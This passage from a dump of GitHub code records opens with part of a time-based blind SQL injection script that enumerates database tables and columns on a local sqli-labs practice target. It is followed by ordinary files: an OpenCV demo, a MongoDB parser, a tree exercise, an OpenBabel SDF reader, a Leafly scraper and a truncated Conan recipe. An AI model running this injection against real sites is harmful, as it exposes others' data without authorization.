返回表名\n\ttables = list()\n\tn = 0\n\twhile True:\n\t\tselect = 'select table_name from information_schema.tables where table_schema = \"{}\" limit {}, 1'.format(database, n)\n\t\tdata = get_data_by_time(target, cross, select)\n\t\tif data != '':\n\t\t\ttables.append(data)\n\t\t\tn += 1\n\t\telse:\n\t\t\tbreak\n\tprint('There are tables {} in database {}'.format(', '.join(tables), database))\n\n\t# 返回列名\n\tfor table in tables:\n\t\tcolumns = list()\n\t\tn = 0\n\t\twhile True:\n\t\t\tselect = 'select column_name from information_schema.columns where table_schema = \"{}\" and table_name = \"{}\" limit {}, 1'.format(database, table, n)\n\t\t\tdata = get_data_by_time(target, cross, select)\n\t\t\tif data != '':\n\t\t\t\tcolumns.append(data)\n\t\t\t\tn += 1\n\t\t\telse:\n\t\t\t\tbreak\n\t\tprint('There are columns {} in table {}'.format(', '.join(columns), table))\t\n\n\nif __name__ == '__main__':\n\n\tTARGET = 'http://127.0.0.1/sqlilabs/Less-10/?id={}' # 存在注入点的URL,参数值用{}替代\n\tVALUE = '1' # 注入参数的原值\n\tCOMMENT = '+--+' # SQL注释格式\n\tDELAY = 0.1 # 测试存在漏洞时的睡眠时间,如果网速特别好这个值可以小一些\n\tTIME_OUT = 60 # 请求超时时间,单位为秒\n\tLOGGING_LEVEL = logging.WARN # 日志级别\n\n\tlogging.basicConfig(level=LOGGING_LEVEL)\n\tlogging.debug('[*] The target is {}'.format(TARGET.format(VALUE)))\n\tmain(TARGET)\n","repo_name":"Werneror/Practise","sub_path":"Python/sqli_time_blind.py","file_name":"sqli_time_blind.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"75"} +{"seq_id":"24499179561","text":"# Program to Print Image Matrix Using OpenCV\r\n\r\nimport cv2\r\n\r\nimgpath = \"C:\\\\Users\\\\hp\\\\Desktop\\\\Python-OpenCV\\\\Dataset\\\\Lena.jpg\"\r\nimg = cv2.imread(imgpath)\r\n\r\nprint(img) # Print Image\r\nprint(img.shape) # Print Shape\r\nprint(img.ndim) # Print Dimenssion\r\nprint(type(img)) # Print Type of Image\r\n\r\ncv2.imshow('Lena',img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"javed2214/Python-OpenCV","sub_path":"OpenCV-3.py","file_name":"OpenCV-3.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17728142902","text":"from mongo import get_database\nimport csv\nimport json\nimport values as va\n\ndef update_engelman_parser(csvFilePath):\n meters_db = get_database()\n coll = meters_db[va.coll_name]\n f = open(csvFilePath,'r')\n arr_meter = csv.reader(f, delimiter = ';')\n for number in arr_meter:\n if number[0] != '«File completely written»':\n if number[2] == 'ID':\n continue\n else:\n if coll.find_one({'_id':number[2]}):\n meter = coll.find_one({'_id':number[2]})['Parser'][0]\n coll.update_one({'_id':number[2]},{'$set':{'Meter time':number[meter['Date']]}})\n if coll.find_one({'_id':number[2]})['Meter type'] == 'Heat':\n coll.update_one({'_id':number[2]},{'$set':{'Heat':number[meter['Heat']]}})\n else:\n if coll.find_one({'_id':number[2]})['Meter type'] == 'Water':\n coll.update_one({'_id':number[2]},{'$set':{'m3':number[meter['m3']]}})\n coll.update_one({'_id':number[2]},{'$set':{'Meter number':number[meter['Meter number']]}})\n coll.update_one({'_id':number[2]},{'$set':{'Status':number[meter['Status']]}})\n else:\n print('no meter')\n#update_engelman_parser('../some_file/engel.csv')\n\n#engelman_convert_parser('../some_file/engel.csv', '../some_json/engel.json')\n","repo_name":"Usychenko/ukrOblik_server","sub_path":"mongo/engelman_parser_insert.py","file_name":"engelman_parser_insert.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30532255145","text":"# needed for python unit testings\n# https://docs.python.org/3/library/unittest.html\nimport unittest\n\n# required for type hinting\n# https://mypy.readthedocs.io/en/stable/cheat_sheet_py3.html\nfrom typing import List, Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n '''\n Find the total tilt of the binary tree\n\n Tilt is the abs(sum of left subtree - sum of right subtree)\n '''\n def findTilt(self, root: Optional[TreeNode]) -> int:\n if root is None:\n return 0\n return self.helper(root)[1]\n\n # returns a tuple of (sum of subtree, sum tilt of subtree)\n def helper(self, root: Optional[TreeNode]) -> (int, int):\n if root is None:\n return (0,0)\n left = self.helper(root.left)\n right = self.helper(root.right)\n tilt = abs(left[0] - right[0])\n return (root.val + left[0] + right[0], tilt + left[1] + right[1])\n\nclass UnitTesting(unittest.TestCase):\n # actual test to run on Solution\n def test_one(self):\n s = Solution()\n t = TreeNode(1, TreeNode(2), TreeNode(3))\n self.assertEqual(s.findTilt(t), 1)\n\n def test_two(self):\n s = Solution()\n t = TreeNode(4, TreeNode(2, TreeNode(3), TreeNode(5)), TreeNode(9, None, TreeNode(7)))\n self.assertEqual(s.findTilt(t), 15)\n\n def test_three(self):\n s = Solution()\n t = TreeNode(21, TreeNode(7, TreeNode(1, TreeNode(3), TreeNode(3)), TreeNode(1)), TreeNode(14, TreeNode(2), TreeNode(2)))\n self.assertEqual(s.findTilt(t), 9)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)","repo_name":"olsenw/LeetCodeExercises","sub_path":"Python3/binary_tree_tilt.py","file_name":"binary_tree_tilt.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70566598964","text":"import requests\nimport json\n\n# Define the input data as a dictionary\ninput_data = {\n \"Location\": \"Lakshmipur\",\n \"Crop_Name\": \"Soyabean\",\n \"Soil_Type\": \"Clayey\",\n \"Yield\": 8\n}\n\n# Convert the input data to JSON\ninput_json = json.dumps(input_data)\n\n# Make a POST request to the Flask API\nurl = \"http://127.0.0.1:8000/api/predict/\" # Local URL\nheaders = {\"Content-Type\": \"application/json\"}\nresponse = requests.post(url, data=input_json, headers=headers)\n\n# Check the response\nif response.status_code == 200:\n result = response.json()\n print(\"Fertilizer Recommendations:\")\n print(json.dumps(result, indent=2))\nelse:\n print(f\"Error: {response.status_code}\")","repo_name":"DukulH/Agrigate_Ferti-Doc","sub_path":"Ferti_Doc_Backend/api/send_request.py","file_name":"send_request.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"12899956052","text":"import os\nimport glob\nimport pandas as pd\nfrom torch.utils.data import Dataset\n\n\nclass RandomAccessCsvsDataset(Dataset):\n def __init__(self, folder_path, file_pattern, x_columns, y_columns, transform=None):\n self.folder_path = folder_path\n self.file_pattern = file_pattern\n self.x_columns = x_columns\n self.y_columns = y_columns\n self.transform = transform\n self.file_list = glob.glob(os.path.join(folder_path, file_pattern))\n self.line_counts = self.get_line_counts()\n\n def get_line_counts(self):\n line_counts = []\n total_lines = 0\n for file in self.file_list:\n with open(file, 'r') as f:\n lines = sum(1 for line in f) - 1 # Subtract 1 for header\n line_counts.append(lines)\n total_lines += lines\n return line_counts\n\n def __len__(self):\n return sum(self.line_counts)\n\n def __getitem__(self, idx):\n # Find the file containing the idx-th data\n file_idx = 0\n while idx >= self.line_counts[file_idx]:\n idx -= self.line_counts[file_idx]\n file_idx += 1\n\n # Read the corresponding line from the file\n file_path = self.file_list[file_idx]\n df = pd.read_csv(file_path, skiprows=idx + 1, nrows=1, header=None)\n\n # Extract x and y variables\n x_data = df.loc[:, self.x_columns].values\n y_data = df.loc[:, self.y_columns].values\n\n # Apply the transform if provided\n if self.transform:\n x_data, y_data = self.transform(x_data, y_data)\n\n return x_data, y_data\n\n\n","repo_name":"microprediction/simplecsvdataset","sub_path":"simplecsvdataset/randomaccess.py","file_name":"randomaccess.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21273950263","text":"\"\"\"\nImplementation of the reader for SDF files using OpenBabel\n\"\"\"\n\nimport bz2\nimport gzip\nfrom pathlib import Path\nimport shutil\nimport string\nimport subprocess\nimport time\n\nfrom openbabel import openbabel\n\nfrom ..registries import register_format_checker\nfrom ..registries import register_reader\nfrom ..registries import register_writer\nfrom ..registries import set_format_metadata\nfrom ...utils import parse_indices\n\nif \"OpenBabel_version\" not in globals():\n OpenBabel_version = None\n\nset_format_metadata(\n [\".sd\", \".sdf\"],\n single_structure=False,\n dimensionality=0,\n coordinate_dimensionality=3,\n property_data=True,\n bonds=True,\n is_complete=False,\n add_hydrogens=True,\n)\n\n\n@register_format_checker(\".sdf\")\ndef check_format(path):\n \"\"\"Check if a file is an MDL SDFile.\n\n Check if the last line is \"$$$$\", which is the terminator for a molecule in SDFiles.\n\n Parameters\n ----------\n path : str or Path\n \"\"\"\n last = \"\"\n with open(path, \"r\") as fd:\n for line in fd:\n line = line.strip()\n if line != \"\":\n last = line\n\n return last == \"$$$$\"\n\n\n@register_reader(\".sd -- MDL structure-data file\")\n@register_reader(\".sdf -- MDL structure-data file\")\ndef load_sdf(\n path,\n configuration,\n extension=\".sdf\",\n add_hydrogens=True,\n system_db=None,\n system=None,\n indices=\"1-end\",\n subsequent_as_configurations=False,\n system_name=\"Canonical SMILES\",\n configuration_name=\"sequential\",\n printer=None,\n references=None,\n bibliography=None,\n **kwargs,\n):\n \"\"\"Read an MDL structure-data (SDF) file.\n\n See https://en.wikipedia.org/wiki/Chemical_table_file for a description of the\n format. This function is using Open Babel to handle the file, so trusts that Open\n Babel knows what it is doing.\n\n Parameters\n ----------\n file_name : str or Path\n The path to the file, as either a string or Path.\n\n configuration : molsystem.Configuration\n The configuration to put the imported structure into.\n\n extension : str, optional, default: None\n The extension, including initial dot, defining the format.\n\n add_hydrogens : bool = True\n Whether to add any missing hydrogen atoms.\n\n system_db : System_DB = None\n The system database, used if multiple structures in the file.\n\n system : System = None\n The system to use if adding subsequent structures as configurations.\n\n indices : str = \"1-end\"\n The generalized indices (slices, SMARTS, etc.) to select structures\n from a file containing multiple structures.\n\n subsequent_as_configurations : bool = False\n Normally and subsequent structures are loaded into new systems; however,\n if this option is True, they will be added as configurations.\n\n system_name : str = \"from file\"\n The name for systems. Can be directives like \"SMILES\" or\n \"Canonical SMILES\". If None, no name is given.\n\n configuration_name : str = \"sequential\"\n The name for configurations. Can be directives like \"SMILES\" or\n \"Canonical SMILES\". If None, no name is given.\n\n printer : Logger or Printer\n A function that prints to the appropriate place, used for progress.\n\n references : ReferenceHandler = None\n The reference handler object or None\n\n bibliography : dict\n The bibliography as a dictionary.\n\n Returns\n -------\n [Configuration]\n The list of configurations created.\n \"\"\"\n global OpenBabel_version\n\n if isinstance(path, str):\n path = Path(path)\n\n path = path.expanduser().resolve()\n\n # Get the information for progress output, if requested.\n n_records = 0\n with (\n gzip.open(path, mode=\"rt\")\n if path.suffix == \".gz\"\n else bz2.open(path, mode=\"rt\")\n if path.suffix == \".bz2\"\n else open(path, \"r\")\n ) as fd:\n for line in fd:\n if line[0:4] == \"$$$$\":\n n_records += 1\n if printer is not None:\n printer(\"\")\n printer(f\" The SDF file contains {n_records} structures.\")\n last_percent = 0\n t0 = time.time()\n last_t = t0\n\n # Get the indices to pick\n indices = parse_indices(indices, n_records)\n n_structures = len(indices)\n if n_structures == 0:\n return\n stop = indices[-1]\n\n obConversion = openbabel.OBConversion()\n obConversion.SetInAndOutFormats(\"sdf\", \"smi\")\n\n configurations = []\n record_no = 0\n structure_no = 0\n n_errors = 0\n obMol = openbabel.OBMol()\n text = \"\"\n with (\n gzip.open(path, mode=\"rt\")\n if path.suffix == \".gz\"\n else bz2.open(path, mode=\"rt\")\n if path.suffix == \".bz2\"\n else open(path, \"r\")\n ) as fd:\n for line in fd:\n text += line\n\n if line[0:4] != \"$$$$\":\n continue\n\n record_no += 1\n if record_no > stop:\n text = \"\"\n break\n if record_no not in indices:\n text = \"\"\n continue\n\n obConversion.ReadString(obMol, text)\n\n # See if the system and configuration names are encoded in the title\n title = obMol.GetTitle()\n sysname = title\n confname = title\n have_sysname = False\n if \"SEAMM=\" in title:\n for tmp in title.split(\"|\"):\n if \"SEAMM=\" in tmp and \"/\" in tmp:\n sysname, confname = tmp.split(\"=\", 1)[1].split(\"/\", 1)\n sysname = sysname.strip()\n confname = confname.strip()\n have_sysname = True\n\n if add_hydrogens:\n obMol.AddHydrogens()\n\n structure_no += 1\n if structure_no > 1:\n if subsequent_as_configurations:\n configuration = system.create_configuration()\n else:\n if have_sysname and \"from file\" in system_name.lower():\n # Reuse the system if it exists\n if system_db.system_exists(sysname):\n system = system_db.get_system(sysname)\n else:\n system = system_db.create_system()\n else:\n system = system_db.create_system()\n configuration = system.create_configuration()\n\n try:\n configuration.from_OBMol(obMol)\n except Exception as e:\n n_errors += 1\n printer(\"\")\n printer(f\" Error handling entry {record_no} in the SDF file:\")\n printer(\" \" + str(e))\n printer(\" Text of the entry is\")\n printer(\" \" + 60 * \"-\")\n for line in text.splitlines():\n printer(\" \" + line)\n printer(\" \" + 60 * \"-\")\n printer(\"\")\n text = \"\"\n continue\n\n configurations.append(configuration)\n text = \"\"\n\n # Set the system name\n if system_name is not None and system_name != \"\":\n lower_name = system_name.lower()\n if \"from file\" in lower_name:\n system.name = sysname\n elif \"canonical smiles\" in lower_name:\n system.name = configuration.canonical_smiles\n elif \"smiles\" in lower_name:\n system.name = configuration.smiles\n else:\n system.name = system_name\n\n # And the configuration name\n if configuration_name is not None and configuration_name != \"\":\n lower_name = configuration_name.lower()\n if \"from file\" in lower_name:\n configuration.name = confname\n elif \"canonical smiles\" in lower_name:\n configuration.name = configuration.canonical_smiles\n elif \"smiles\" in lower_name:\n configuration.name = configuration.smiles\n elif lower_name == \"sequential\":\n configuration.name = str(record_no)\n else:\n configuration.name = configuration_name\n\n if printer:\n percent = int(100 * structure_no / n_structures)\n if percent > last_percent:\n t1 = time.time()\n if t1 - last_t >= 60:\n t = int(t1 - t0)\n rate = structure_no / (t1 - t0)\n t_left = int((n_structures - structure_no) / rate)\n printer(\n f\"\\t{structure_no:6} ({percent}%) structures read in {t} \"\n f\"seconds. About {t_left} seconds remaining.\"\n )\n last_t = t1\n last_percent = percent\n\n if printer:\n t1 = time.time()\n rate = structure_no / (t1 - t0)\n printer(\n f\" Read {structure_no - n_errors} structures in {t1 - t0:.1f} \"\n f\"seconds = {rate:.2f} per second\"\n )\n if n_errors > 0:\n printer(f\" {n_errors} structures could not be read due to errors.\")\n\n if references:\n # Add the citations for Open Babel\n references.cite(\n raw=bibliography[\"openbabel\"],\n alias=\"openbabel_jcinf\",\n module=\"read_structure_step\",\n level=1,\n note=\"The principle Open Babel citation.\",\n )\n\n # See if we can get the version of obabel\n if OpenBabel_version is None:\n path = shutil.which(\"obabel\")\n if path is not None:\n path = Path(path).expanduser().resolve()\n try:\n result = subprocess.run(\n [str(path), \"--version\"],\n stdin=subprocess.DEVNULL,\n capture_output=True,\n text=True,\n )\n except Exception:\n OpenBabel_version = \"unknown\"\n else:\n OpenBabel_version = \"unknown\"\n lines = result.stdout.splitlines()\n for line in lines:\n line = line.strip()\n tmp = line.split()\n if len(tmp) == 9 and tmp[0] == \"Open\":\n OpenBabel_version = {\n \"version\": tmp[2],\n \"month\": tmp[4],\n \"year\": tmp[6],\n }\n break\n\n if isinstance(OpenBabel_version, dict):\n try:\n template = string.Template(bibliography[\"obabel\"])\n\n citation = template.substitute(\n month=OpenBabel_version[\"month\"],\n version=OpenBabel_version[\"version\"],\n year=OpenBabel_version[\"year\"],\n )\n\n references.cite(\n raw=citation,\n alias=\"obabel-exe\",\n module=\"read_structure_step\",\n level=1,\n note=\"The principle citation for the Open Babel executables.\",\n )\n except Exception:\n pass\n\n return configurations\n\n\n@register_writer(\".sd -- MDL structure-data file\")\n@register_writer(\".sdf -- MDL structure-data file\")\ndef write_sdf(\n path,\n configurations,\n extension=None,\n remove_hydrogens=\"no\",\n printer=None,\n references=None,\n bibliography=None,\n):\n \"\"\"Write an MDL structure-data (SDF) file.\n\n See https://en.wikipedia.org/wiki/Chemical_table_file for a description of the\n format. This function is using Open Babel to handle the file, so trusts that Open\n Babel knows what it is doing.\n\n Parameters\n ----------\n path : str\n Name of the file\n\n configurations : [Configuration]\n The SEAMM configurations to write\n\n extension : str, optional, default: None\n The extension, including initial dot, defining the format.\n\n remove_hydrogens : str = \"no\"\n Whether to remove hydrogen atoms before writing the structure to file.\n\n printer : Logger or Printer\n A function that prints to the appropriate place, used for progress.\n\n references : ReferenceHandler = None\n The reference handler object or None\n\n bibliography : dict\n The bibliography as a dictionary.\n \"\"\"\n global OpenBabel_version\n\n if isinstance(path, str):\n path = Path(path)\n\n path.expanduser().resolve()\n\n obConversion = openbabel.OBConversion()\n obConversion.SetInAndOutFormats(\"smi\", \"sdf\")\n\n n_structures = len(configurations)\n last_percent = 0\n last_t = t0 = time.time()\n structure_no = 1\n compress = path.suffix == \".gz\"\n with gzip.open(path, mode=\"wb\") if compress else open(path, \"w\") as fd:\n for configuration in configurations:\n obMol = configuration.to_OBMol(properties=\"all\")\n\n system = configuration.system\n title = f\"SEAMM={system.name}/{configuration.name}\"\n obMol.SetTitle(title)\n\n if remove_hydrogens == \"nonpolar\":\n obMol.DeleteNonPolarHydrogens()\n elif remove_hydrogens == \"all\":\n obMol.DeleteHydrogens()\n\n if structure_no == 1:\n text = obConversion.WriteString(obMol)\n else:\n text = obConversion.WriteString(obMol)\n\n # if not ok\n if text is None or text == \"\":\n raise RuntimeError(\"Error writing file\")\n\n if compress:\n fd.write(bytes(text, \"utf-8\"))\n else:\n fd.write(text)\n\n structure_no += 1\n if printer:\n percent = int(100 * structure_no / n_structures)\n if percent > last_percent:\n t1 = time.time()\n if t1 - last_t >= 60:\n t = int(t1 - t0)\n rate = structure_no / (t1 - t0)\n t_left = int((n_structures - structure_no) / rate)\n printer(\n f\"\\t{structure_no:6} ({percent}%) structures wrote in {t} \"\n f\"seconds. About {t_left} seconds remaining.\"\n )\n last_t = t1\n last_percent = percent\n\n if printer:\n t1 = time.time()\n rate = structure_no / (t1 - t0)\n printer(\n f\" Wrote {structure_no - 1} structures in {t1 - t0:.1f} seconds = \"\n f\"{rate:.2f} per second\"\n )\n\n if references:\n # Add the citations for Open Babel\n references.cite(\n raw=bibliography[\"openbabel\"],\n alias=\"openbabel_jcinf\",\n module=\"read_structure_step\",\n level=1,\n note=\"The principle Open Babel citation.\",\n )\n\n # See if we can get the version of obabel\n if OpenBabel_version is None:\n path = shutil.which(\"obabel\")\n if path is not None:\n path = Path(path).expanduser().resolve()\n try:\n result = subprocess.run(\n [str(path), \"--version\"],\n stdin=subprocess.DEVNULL,\n capture_output=True,\n text=True,\n )\n except Exception:\n OpenBabel_version = \"unknown\"\n else:\n OpenBabel_version = \"unknown\"\n lines = result.stdout.splitlines()\n for line in lines:\n line = line.strip()\n tmp = line.split()\n if len(tmp) == 9 and tmp[0] == \"Open\":\n OpenBabel_version = {\n \"version\": tmp[2],\n \"month\": tmp[4],\n \"year\": tmp[6],\n }\n break\n\n if isinstance(OpenBabel_version, dict):\n try:\n template = string.Template(bibliography[\"obabel\"])\n\n citation = template.substitute(\n month=OpenBabel_version[\"month\"],\n version=OpenBabel_version[\"version\"],\n year=OpenBabel_version[\"year\"],\n )\n\n references.cite(\n raw=citation,\n alias=\"obabel-exe\",\n module=\"read_structure_step\",\n level=1,\n note=\"The principle citation for the Open Babel executables.\",\n )\n except Exception:\n pass\n\n return configurations\n","repo_name":"molssi-seamm/read_structure_step","sub_path":"read_structure_step/formats/sdf/sdf.py","file_name":"sdf.py","file_ext":"py","file_size_in_byte":17116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"69955147450","text":"import re\n\norder = input()\n\npattern = r\">>\\b\\w+<<\\b\\d+(\\.\\d+)?!\\b\\d+\\b\"\nresult = {'name': [], 'price': []}\n\nwhile order != \"Purchase\":\n item = re.finditer(pattern, order)\n\n for i in item:\n item = re.findall(r\"[^<>!]+\", i.group())\n result['name'].append(item[0])\n result['price'].append(float(item[1]) * int(item[2]))\n\n order = input()\n\nprint(\"Bought furniture:\")\n[print(name) for name in result['name']]\nprint(f\"Total money spend: {sum(result['price']):.2f}\")\n","repo_name":"xMrShadyx/SoftUni","sub_path":"Python Fundamentals - September 2020/18_Regular_Expressions_Exercise/05_Furniture.py","file_name":"05_Furniture.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"8561400523","text":"import discord\r\nfrom discord_slash.utils.manage_components import *\r\nfrom wsclasses import *\r\nfrom urllib.request import urlopen, Request\r\nfrom urllib.error import HTTPError\r\nfrom urllib.parse import urlencode, quote_plus\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom googlesearch import search\r\n\r\nfeelingslist = ['Aroused', 'Creative', 'Energetic', 'Euphoric', 'Focused', 'Giggly', 'Happy', 'Hungry', 'Relaxed', 'Sleepy', 'Talkative', 'Tingly', 'Uplifted']\r\nneglist = ['Anxious', 'Dizzy', 'Dry eyes', 'Dry mouth', 'Headache', 'Paranoid']\r\nhelplist = ['ADD/ADHD', 'Alzheimer\\'s', 'Anorexia', 'Anxiety', 'Arthritis', 'Asthma', 'Bipolar disorder', 'Cachexia', 'Cancer', 'Cramps', 'Crohn\\'s disease', 'Depression', 'Epilepsy', 'Eye pressure', 'Fatigue', 'Fibromyalgia', 'Gastrointestinal disorder', 'Glaucoma', 'Headaches', 'HIV/AIDS', 'Hypertension', 'Inflammation', 'Insomnia', 'Lack of appetite', 'Migraines', 'Multiple sclerosis', 'Muscle spasms', 'Muscular dystrophy', 'Nausea', 'Pain', 'Parkinson\\'s', 'Phantom limb pain', 'PMS', 'PTSD', 'Seizures', 'Spasticity', 'Spinal cord injury', 'Stress', 'Tinnitus', 'Tourette\\'s syndrome']\r\n\r\n\r\nasync def leaflyinfo(query): # Gets search results and returns message embed\r\n #link = Request(\"https://www.leafly.com/search?q=\" + quote_plus(query) + \"&searchCategory=strain\", headers={'Accept': 'text/html', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 OPR/86.0.4363.64'})\r\n #print(quote_plus(query))\r\n #try:\r\n # info = urlopen(link) # Grab html\r\n #except HTTPError as e:\r\n # info = e.read()\r\n \r\n #bssearch = bs(info, 'html.parser') # Converts to BeautifulSoup object\r\n #print(bssearch)\r\n #if bssearch.head.title.get_text() == '500: Internal Server Error':\r\n # return None\r\n\r\n # results = bssearch.find_all(class_='relative flex flex-col justify-between bg-white h-full elevation-low rounded')\r\n # Grabs each 'box''s div element\r\n results = search(term=f'{query.lower()} site:leafly.com/strains', num_results=2, advanced=True)\r\n isset = False\r\n for result in results:\r\n print(result.title)\r\n if not isset:\r\n isset=True\r\n rslt = result.url\r\n if query.lower() in result.title:\r\n \r\n return result.url\r\n # If the strain name matches the query exactly (except case)\r\n \r\n return rslt\r\n # If the above three fail, just return the first result\r\n\r\n \r\n\r\nasync def leaflyresultmessage(ctx, link):\r\n\r\n url = link\r\n link = Request(url=link, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 OPR/79.0.4143.50'})\r\n try:\r\n info = urlopen(link) # Grab html\r\n except HTTPError as e:\r\n info = e.read()\r\n bssearch = bs(info, 'html.parser') # Converts to BeautifulSoup object\r\n print(bssearch)\r\n name = bssearch.find('h1', attrs={'itemprop':'name'}).get_text()\r\n aka = bssearch.find('h2', attrs={'itemprop':'name'})\r\n try:\r\n aka = aka.get_text().replace('aka','').strip()\r\n desc = '*(aka:* ***' + aka + '*** *)*\\n\\n' + '__**Description:**__\\n\\n' + bssearch.find('div', itemprop='description').get_text()\r\n except AttributeError:\r\n desc = '__**Description:**__\\n' + bssearch.find('div', itemprop='description').get_text()\r\n weedpic = bssearch.find('picture', attrs={'data-testid':'image-picture-element'}).img['srcset'].split('?', 1)[0]\r\n\r\n\r\n newEmbed = discord.Embed(title=name, url=url)\r\n newEmbed.description = desc[:2048]\r\n # newEmbed.add_field(name='Description:', value=desc)\r\n newEmbed.set_thumbnail(url=weedpic)\r\n newEmbed.set_footer(text='(Strain information courtesy Leafly.com)')\r\n \r\n # if bssearch.find(string='ve smoked, dabbed, or otherwise enjoyed this strain') != None:\r\n try:\r\n indicapercent = int(bssearch.find(class_='bg-default rounded-full')['style'].split('width:')[1].split('.')[0])\r\n\r\n # bar = '`'\r\n # for x in range(int(indicapercent * 38 / 100)):\r\n # bar = bar + '█'\r\n # for x in range(int((100 - indicapercent) * 38 / 100)):\r\n # bar = bar + '∙'\r\n # bar = bar + '`'\r\n # newEmbed.add_field(name='Indica <━━━━━━━━━━━━━━━> Sativa', value=bar, inline=False)\r\n newEmbed.add_field(name='__Type__', value=str(indicapercent)+'% Indica')\r\n except Exception as e:\r\n print(e)\r\n pass\r\n cannabinoids = [] \r\n cannabinoids = bssearch.find_all('span', class_='text-xs rounded flex items-center mr-xl')\r\n\r\n if len(cannabinoids) >= 1:\r\n newEmbed.add_field(name='__'+cannabinoids[0].get_text().split()[0].strip('Loading...')+'__', value=cannabinoids[0].get_text().split()[1])\r\n if len(cannabinoids) >= 2:\r\n newEmbed.add_field(name='__'+cannabinoids[1].get_text().split()[0].strip('Loading...')+'__', value=cannabinoids[1].get_text().split()[1])\r\n if len(cannabinoids) >= 3:\r\n newEmbed.add_field(name='__'+cannabinoids[2].get_text().split()[0].strip('Loading...')+'__', value=cannabinoids[2].get_text().split()[1])\r\n if len(cannabinoids) >= 4:\r\n newEmbed.add_field(name='__'+cannabinoids[3].get_text().split()[0].strip('Loading...')+'__', value=cannabinoids[3].get_text().split()[1])\r\n\r\n try:\r\n domterp = bssearch.find('a', attrs={'aria-label':'Terpene Information'}).get_text()\r\n newEmbed.add_field(name='__Dominant Terp__', value=domterp)\r\n except Exception as e:\r\n print(e)\r\n pass\r\n possibleflavs=['Ammonia', 'Apple', 'Apricot', 'Berry', 'Blueberry', 'Blue Cheese', 'Butter', 'Cheese', 'Chemical', 'Chestnut', 'Citrus', 'Coffee', 'Diesel',\r\n 'Earthy', 'Flowery', 'Grape', 'Grapefruit', 'Honey', 'Lavender', 'Lemon', 'Lime', 'Mango', 'Menthol', 'Mint', 'Nutty', 'Orange', 'Peach',\r\n 'Pear', 'Pepper', 'Pine', 'Pineapple', 'Plum', 'Pungent', 'Rose', 'Sage', 'Skunk', 'Spicy/Herbal', 'Strawberry', 'Sweet', 'Tar', 'Tea',\r\n 'Tobacco', 'Tree fruit', 'Tropical', 'Vanilla', 'Violet', 'Woody']\r\n flavs = ''\r\n for res in bssearch.find_all('a', href='/strains/lists/effect/'):\r\n if res.get_text() in possibleflavs:\r\n flavs += f'{res.get_text()}\\n'\r\n\r\n if flavs != '':\r\n flavs.strip('\\n')\r\n newEmbed.add_field(name='__Flavors__', value=flavs)\r\n\r\n\r\n try:\r\n feelings = bssearch.find(id='Feelings-tab').find_all(p)\r\n effects = ''\r\n for feeling in feelings:\r\n effects += feeling.get_text() + '\\n'\r\n effects.strip('\\n')\r\n newEmbed.add_field(name='__Feelings__', value=effects)\r\n except Exception as e:\r\n print(e)\r\n pass\r\n try:\r\n negatives = bssearch.find(id='Negatives-tab').find_all(p)\r\n effects = ''\r\n for neg in negatives:\r\n effects += neg.get_text() + '\\n'\r\n effects.strip('\\n')\r\n newEmbed.add_field(name='__Negatives__', value=effects)\r\n except Exception as e:\r\n print(e)\r\n pass\r\n return newEmbed\r\n\r\n\r\n","repo_name":"PapaKool/WhatStrain","sub_path":"lfuncts.py","file_name":"lfuncts.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31942431295","text":"from conan import ConanFile\nfrom conan.tools.build import check_min_cppstd\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\nfrom conan.tools.files import apply_conandata_patches, copy, export_conandata_patches, get, replace_in_file, rmdir\nimport os\n\nrequired_conan_version = \">=1.53.0\"\n\n\nclass GlbindingConan(ConanFile):\n name = \"glbinding\"\n description = \"A C++ binding for the OpenGL API, generated using the gl.xml specification.\"\n license = \"MIT\"\n topics = (\"opengl\", \"binding\")\n homepage = \"https://glbinding.org/\"\n url = \"https://github.com/conan-io/conan-center-index\"\n\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n }\n\n def export_sources(self):\n export_conandata_patches(self)\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def validate(self):\n if self.settings.compiler.get_safe(\"cppstd\"):\n check_min_cppstd(self, 11)\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.cache_variables[\"BUILD_SHARED_LIBS\"] = self.options.shared\n tc.cache_variables[\"OPTION_SELF_CONTAINED\"] = False\n tc.cache_variables[\"OPTION_BUILD_TESTS\"] = False\n 